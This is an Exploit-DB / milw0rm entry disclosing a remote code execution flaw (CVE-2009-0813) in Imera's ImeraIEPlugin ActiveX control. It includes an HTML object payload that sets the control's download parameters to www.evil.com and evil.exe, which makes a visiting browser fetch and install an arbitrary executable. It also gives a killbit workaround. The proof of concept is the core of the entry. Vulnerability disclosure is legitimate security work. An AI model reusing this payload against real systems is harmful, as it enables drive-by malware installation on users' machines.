Imera ImeraIEPlugin ActiveX Control Remote Code Execution Exploit



EDB-ID: 8144 CVE: 2009-0813 OSVDB-ID: 52322
Author: Elazar Published: 2009-03-03 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Who:
 Imera(http://www.imera.com)
 Imera TeamLinks Client(http://teamlinks.imera.com/install.html)

What:
 ImeraIEPlugin.dll
 Version 1.0.2.54
 Dated 12/02/2008
 {75CC8584-86D4-4A50-B976-AA72618322C6}
 http://teamlinks.imera.com/ImeraIEPlugin.cab

How:
 This control is used to install the Imera TeamLinks Client
package. The control fails to validate the content that it is to
download and install is indeed the Imera TeamLinks Client software.

Exploiting this issue is quite simple, like so:

<object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6"
id="obj">
	<param name="DownloadProtocol" value="http" />
	<param name="DownloadHost" value="www.evil.com" />
	<param name="DownloadPort" value="80" />
	<param name="DownloadURI" value="evil.exe" />
</object>

Fix:
 The vendor has been notified.

Workaround:
 Set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.
Use the Java installer for TeamLinks Client or install the software
manually from: http://teamlinks.imera.com/download.html

Elazar

# milw0rm.com [2009-03-03]